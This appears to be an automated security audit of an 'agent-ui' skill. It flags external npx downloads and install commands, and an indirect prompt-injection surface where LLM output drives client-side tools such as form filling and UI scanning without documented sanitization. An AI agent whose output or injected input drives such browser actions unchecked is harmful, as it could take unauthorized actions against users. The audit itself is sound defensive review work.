agent-ui
Warn
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: MEDIUMEXTERNAL_DOWNLOADSCOMMAND_EXECUTION
Full Analysis
- EXTERNAL_DOWNLOADS (MEDIUM): The skill instructs the user to install a component via 'npx shadcn@latest add https://ui.inference.sh/r/agent.json'. This downloads and executes code from an unverified external domain (inference.sh) which is not on the trusted sources list.
- COMMAND_EXECUTION (MEDIUM): The skill suggests running 'npx skills add' for multiple related components (chat-ui, widgets-ui, tools-ui). Running unverified install scripts can lead to arbitrary code execution if the source repository is compromised.
- INDIRECT_PROMPT_INJECTION (LOW): The skill features 'Generative UI' and 'Client-side tools' which process LLM outputs to render widgets and fill forms. This creates a vulnerability surface where a malicious agent response could attempt to perform unauthorized actions in the user's browser.
- Ingestion points: Agent responses and JSON UI definitions via 'agentConfig' and 'config' props.
- Boundary markers: None visible in the provided component interface; the LLM output directly influences the client-side tool execution.
- Capability inventory: Client-side form filling ('fill_field'), UI scanning ('scan_ui'), and dynamic widget rendering.
- Sanitization: The documentation does not specify sanitization or validation protocols for the JSON data received from the agent before rendering widgets.
Audit Metadata